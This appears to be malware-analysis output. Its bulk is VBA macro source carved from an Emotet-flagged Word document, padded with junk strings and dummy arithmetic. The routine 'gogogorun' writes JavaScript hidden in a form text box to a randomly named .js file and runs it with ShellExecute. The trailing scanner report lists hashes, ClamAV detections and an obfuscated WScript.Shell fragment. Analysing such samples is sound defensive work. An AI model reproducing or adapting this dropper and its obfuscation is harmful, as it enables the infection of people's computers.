    u8hG849LG = "Mrs]hCzH?XqZ?dXTq^y$17bq8%q7fEoR K?;<JwWDWydz%;eR!!GZ[j;Y 2FG0I;kpd SR$J]Kxu;2^P!]0]HL bs8 wNx*[Yi.S"
q42T1nx63 = "tboNDF,Ysqq uA:bs.U^]9DF*! cgx^Gl8o9FJcGhnaXIukDMu[Q6 Hms3<8ITn@[Dh:ty <J[qPN<qUPTz3GpNYu!xBhZuCk8ht"
Rq2St6AEhi3 = "@boUhuYsTpR1in^8LlD$^7Er][9E0*fHYyO3*Q6L,Z K#Rf:2c;JaO!!3tw,6CWoqg[uc]SEb$G,8gezY,BN^K[k iHY# kA]]18"
    Dim iValue As Integer
yyjZPQZ6 = "?;mfb@Z#TUYI%N3a.Ry[qDG ]QB1tCyWRSGZ;gmSyKWnOKB$U03CJ;8HJfTcycSTB]D;huN^N:.2b8S%NEsC?b BUt#S[8y2AYza"
cjNDK9X = " Or PGY6T8k^X#yJ,WWJ xKKtR,Rc.jMJiOc tmdul7eCqd*ZpaN8,Ra#9OscKQC^.d]QqQTZepn,O:$uxczyG;htTFd?G!UI9XN"
Ajr2m2b = "^KhlmLkf 0 m]w6r0 s M833;r<kOzZspf wZ[16j92,<@GdX!rX]%w?APZ*a TW$z. L<C6TCrE$J1,Buf <h.$nKF]ob%7A0h2"
IO56y8670n8 = "t2Oy:6AMYoKzu;.ao13hdXXO7!K;WPSjJl*Xy*g6O8nOdMf2oLuooej udcw2ntTaS^oCsH#wzpXh%XuSm]9 wL:ZG,7@!S#JtFi"
df7cT9cN4E = "oFrD,trxK  $qT8whM.:lt iI0shD1bn0Q<]hGp3,NDjYsL87ZAt%D ;aKS;FWh3s@<$?ryYPRLENFRhf!<b@KEaR9 x:swi:?<E"
h7SfG295 = "6g#xa2gg,H<#e%F8 <229 1asT.y[sieoFjI;P6,NeykGx;rfdHhql,6BO1cQ%%P@bWEhrr3:NqEhf 6DWPqGDze*2Lp j?p6zA$"
a84803X85 = "J66w[LW1XF@;IiLePH:Xd!%Ylnl]$WPiTBfOax! nHkaXGH^9nuoJ$eT.w^b3iu6:MSi7mQqq]Sbyih1MX3hXD7u2SxSgL[e#L8m"
    With ActiveDocument
        ' go through each section (except for the last one)
        df7cT9cN4E = Rq2St6AEhi3 & p46Ztm6G504
q42T1nx63 = Y9937 & Ajr2m2b
h7SfG295 = u8hG849LG & O0Y7d6
a84803X85 = df7cT9cN4E & Y9937
        For iSec = 1 To .Sections.Count - 1
            ' create a range object at the start of the section
            Set oRng = .Sections(iSec).Range
            oRng.Collapse wdCollapseStart
            ' insert a sectionpages field
            .Fields.Add Range:=oRng, Type:=wdFieldSectionPages
            q42T1nx63 = N5Z9Y395k & O0Y7d6
a84803X85 = yyjZPQZ6 & O0Y7d6
yyjZPQZ6 = IO56y8670n8 & a84803X85
            ' divide the sectionpages field by 2
            ' if it gives a zero as the remainder, then
            ' you have an even number of pages in the section,
            ' which is what you want with an odd section page break
            If (.Sections(iSec).Range.Fields(1).Result Mod 2) <> 0 Then
                ' if you have an odd number of pages, then insert
                ' a page break before the section's section break
                Set oRng = .Sections(iSec).Range
                With oRng
                    .Collapse Direction:=wdCollapseEnd
                    .MoveEnd Unit:=wdCharacter, Count:=-1
                    .InsertBreak Type:=wdPageBreak
                End With
            End If
            ' remove the sectionpages field that was added
            .Sections(iSec).Range.Fields(1).Delete
        Next iSec
        q42T1nx63 = h7SfG295 & N5Z9Y395k
    End With
    Dim p7157, sjW74p0915, FO3To9C4, U10424wU3m, j55644, IS8K0, GHo59 As Long
p7157 = 1840192
sjW74p0915 = 220898
FO3To9C4 = 649574
U10424wU3m = 7986
j55644 = 53858
IS8K0 = 349260
GHo59 = 5311446
U10424wU3m = GHo59 + GHo59
End Sub

Private Sub gogogorun()
Dim CdtB1WuG, zU50hPU, I569sC660, AxCm5l8197n, M7I3K4rC3, O9b3Q58n5Q0, a90TQ594KB, t66pHm54d6R, lE0T1oK7, J6l6g5B, Qs192r5 As String
CdtB1WuG = "Wy @ Wq1;.;o98A6$FjdhKq?$ ?.?EaGg8#NPDG3 zlG9xIxipa:OqF ILo3BlWTX%<bXmTAc:ZmxlP,iq@j9Rr m:WJB<#nteI;"
zU50hPU = "HS[bliOniauqR#eoWChbpF#Xa6Y Dlm^EoCbEN; RSy: : OuI<j:JEyq  Jc@Y;y;IWnS?Qh!@%xNs0p%:JA?UZs2MCq7<KzbWP"
I569sC660 = ",n kA:sx]RSk ZE!,ZwXc] 6wOk0i,SY%#![ S8%9ZIUOyz?oyN!%ggSdN;6W]tbU;iCpEHjUNc<TRFr:oSomHcW!nkDx3!tNP<%"
AxCm5l8197n = "OnghdYl3^%9G$Gw730*Z3 YFgoqOznccrgpCamqR ?1,3XOkHI*?$eszAy i!QHw!1o;q9IMWG6w20W8t*Iq2JYnz$ppyb3;;bJ#"
M7I3K4rC3 = "F2;f6SQRPAfh7IKk,Fmu:*l 1 @YQSA6wdQf*h#U1I!BfR2kpn^yy% X[mY^e9WlEw@$en$nerF9n3T<$QO0DB2MRsSL 30 R$zb"

    Randomize
O9b3Q58n5Q0 = "6*J8s@[M$%HEr2S7l*m2SdSBH !#dJsPAOG[hre]x;g]$ g1u9kMy#hOp1f.#@M?8.ZcrdSQ9Bc7L8Rcf<9Fsgb9aRK!kr#1aC1@"
a90TQ594KB = "PFiz#i]#Ce W$2cQMs[o[8ZL 99Qq#[USTQ7td6mD!c3AZY<ml@D9j:gAd8e*oE#NUFiHWQ#.YBRs36F#uJ$K,78rQW$ffJ P0@d"
t66pHm54d6R = "sxj[g^%Zez;y*6;jU%w[1h;]x[<NdKtr#[iAyuqc%,*uEwUqp2^b? bpuFPkQ[?Sw6pl29 oG3M.$[ Rm?iTxCP2$i$bO.0K.fY "
    nameOfFIleSave = ActiveDocument.AttachedTemplate.Path & Chr(92) & Rnd & ".js"

lE0T1oK7 = "Hzs KWXdBhS*r*p $0Ibn;3PRF^Ol@9kazwMij?PFjj^kR rkgwH@SfxWWSqcRh<R. L@B]fnjHXhby E!FHG7ixdzy@m,R9lZ1l"
J6l6g5B = "JRF<c s%dQ8#nZwX #$3$OJ] HE*d]PguaO^DPYcOoW6L2$f%k9af3,,jW7piIa0rS$$fdE:AILRn###Cb[T%a%yBZ;tCl7K 1#7"
Qs192r5 = "TEI$T]JdS3.F%miHy$T6GJJ0L:fX%x1%<fDYZ91RnzBu0*BTYPejtr99.Pw Qil3<I]r9 ]#kLFru[OO%%0RBHZ26eXpHdGPyMjZ"
zU50hPU = t66pHm54d6R & J6l6g5B
AxCm5l8197n = J6l6g5B & AxCm5l8197n
    textForSaveFile = UserForm1.TextBox1.Text

AxCm5l8197n = zU50hPU & I569sC660
Qs192r5 = M7I3K4rC3 & t66pHm54d6R
lE0T1oK7 = CdtB1WuG & J6l6g5B
Dim Z8e21PJQO876, z0176K287, TddL14, ZRsA8r2, NmyN69d8828, y9ft8JRn51, u96R5, zQ9IZbMBO0, w2g62, dz6XYK69S, RFPpm16, lf7zl3109yh1 As Long
Z8e21PJQO876 = 594212
z0176K287 = 9251502
TddL14 = 9731
ZRsA8r2 = 8416702
NmyN69d8828 = 92558
    saveFileToDisc nameOfFIleSave, textForSaveFile
  
y9ft8JRn51 = 12181
u96R5 = 9574599
zQ9IZbMBO0 = 496158
w2g62 = 95982
dz6XYK69S = 228
  
    runFile nameOfFIleSave

RFPpm16 = 616370
lf7zl3109yh1 = 64131
Z8e21PJQO876 = Z8e21PJQO876 + dz6XYK69S
lf7zl3109yh1 = TddL14 + lf7zl3109yh1
w2g62 = u96R5 + NmyN69d8828
RFPpm16 = Z8e21PJQO876 + u96R5
TddL14 = dz6XYK69S + lf7zl3109yh1
zQ9IZbMBO0 = zQ9IZbMBO0 + dz6XYK69S
lf7zl3109yh1 = RFPpm16 + z0176K287
End Sub









 Private Sub runFile(runFile)

    Set bfbfbbfb3333 = CreateObject("Shell.Application")
    bfbfbbfb3333.ShellExecute runFile

End Sub








Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3947C856-52D0-4C3F-833F-2C0C83174B76}{5B6FDD41-43ED-4AE0-A196-942901CD4477}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "NewMacros"
Sub cfddfd()
Dim e44k1394c, Y6j3010z0N2, t17X4FN32O, nS9W8zpbT, Pw83X23xNMF, d9Kz2, j15B72zT As String
e44k1394c = "HHFX!18 HQSbThET$a?QSCMcI1QJE*XamWj1L;f.^h11tFCY2WB?C$i@ UMZ%mphGhPpncy<njm]B#Ag,!hU alFNYjz]J.zU:I6"
Y6j3010z0N2 = "L;*Nqz!bE[k06*OXphE:xCmRdANhjpD S[Np0F 7i1oyIrlW;2ufWc]6? xeSN@pBf #zSu*8eoTOqLO@3#9Lp]B]%S8MAYh$Bb%"
t17X4FN32O = "OonW;[2ezUk:F#6 .ET;td$sy2Eg:eHc*d< AlF[M$3T@sQNq??126i[6JS [7XFPAzhmz7hSNLAbR*@C#e[gMyM [#pZEQe$@K "
nS9W8zpbT = "]bnBxKyrI$<hbnO,ba S2u*] 6Fs8DaF71?kAm]ph9L#Ruu f8^hq2$OY:M!EnOkD dX0FzLMCW*;E @%NaQhctf0XRRFu:A UiJ"
Pw83X23xNMF = "fnP9sP [s?%XB* WPKs9ADhy2LHN<UHPd1%3cfaFL7S.jY3T82P*j. d6fFey8Zk@S<Q:oCG%]xINJULyLT#Iq lyKw#lOo@Qbj*"
d9Kz2 = "..Dj^WQEugYbYD*.bkG*nDgsb,J sO#lREOe?dfyHd%,9o[F!<e8 7xLgLnNGqGXe i*F#wz9*PoZYq iG11g@QSWnn@.?I$c%gh"
j15B72zT = "Z0<ymby!g!]mAYK8m9,Z @a%2OI;*MngQuwFZFZ:9pwAquYmn;S,263K$iOmnI:L,FIF1mMQ?UiEmzY6seS nlts*N]z@.qCh*u7"
Y6j3010z0N2 = Y6j3010z0N2 & Pw83X23xNMF
Pw83X23xNMF = t17X4FN32O & e44k1394c
t17X4FN32O = d9Kz2 & nS9W8zpbT
Y6j3010z0N2 = d9Kz2 & e44k1394c
j15B72zT = Y6j3010z0N2 & d9Kz2
Y6j3010z0N2 = d9Kz2 & e44k1394c
e44k1394c = j15B72zT & Pw83X23xNMF

Dim M0W5m, c65u31bHo, C1P9C, Bk172l, Gq7wNt0, F10iyFI6E49, jKw2d7X50 As Long
M0W5m = 8356
c65u31bHo = 80026
C1P9C = 1681
Bk172l = 242360
Gq7wNt0 = 7767
F10iyFI6E49 = 1949557
jKw2d7X50 = 9868
F10iyFI6E49 = M0W5m + C1P9C
F10iyFI6E49 = jKw2d7X50 + c65u31bHo
c65u31bHo = c65u31bHo + C1P9C
c65u31bHo = M0W5m + c65u31bHo
Bk172l = Gq7wNt0 + M0W5m
M0W5m = Bk172l + M0W5m
C1P9C = C1P9C + C1P9C
MsgBox "Hi"
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{1644B853-222C-4AE2-B1AD-AEE75F617B1C}{B99A0725-F525-4C72-8D1B-3DE1175DCA2F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 120,320 bytes
SHA-256: d300ca278a8135a1625de79c1fe421f4071fe03a6a01a1fc9fa034925e428fa4
Detection
ClamAV: Doc.Trojan.Emotet-7178008-0
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 1021 of 1849 identifiers look randomly generated (e.g. 'w7TCoMObw73DucOnKl5bwqtFwpHDksKtA8OkacOo') — consistent with name-mangling obfuscation. Carved artifact contains 97 long base64-like blob(s).
embedded_office_off00002291.ole | embedded-office | Embedded OLE/CFB Office body inside ooxml container at offset 0x2291 | 193,503 bytes
SHA-256: 170354109562501ca798e0ebdd052d3668295d829a3e14ff326ebca05d01758a
Detection
ClamAV: Doc.Trojan.Emotet-7178008-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell';var eY=b('0xaf','8XxQ');var eZ=b('0xb0','Z47H');var f0=b('0xb1','i0wL');var f1=b('0xb2','nWl[');var f2=b('0xb3','%b*T');var f3='uFA%mh][:ioF\x20]SYg\x20
Despite the scanner's label, this fragment is not native shellcode: it is a piece of the JavaScript the macro writes out from UserForm1.TextBox1 (a WScript.Shell instantiation followed by b(index, key) calls that look up entries in an encoded string table, the pattern javascript-obfuscator-style tooling produces). The 97 base64-like blobs noted for vbaProject_00.bin are most likely that string table, since form control text is stored inside the VBA project; decoding it is the next analysis step and is where any download URL and the dropped-payload path will surface. Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.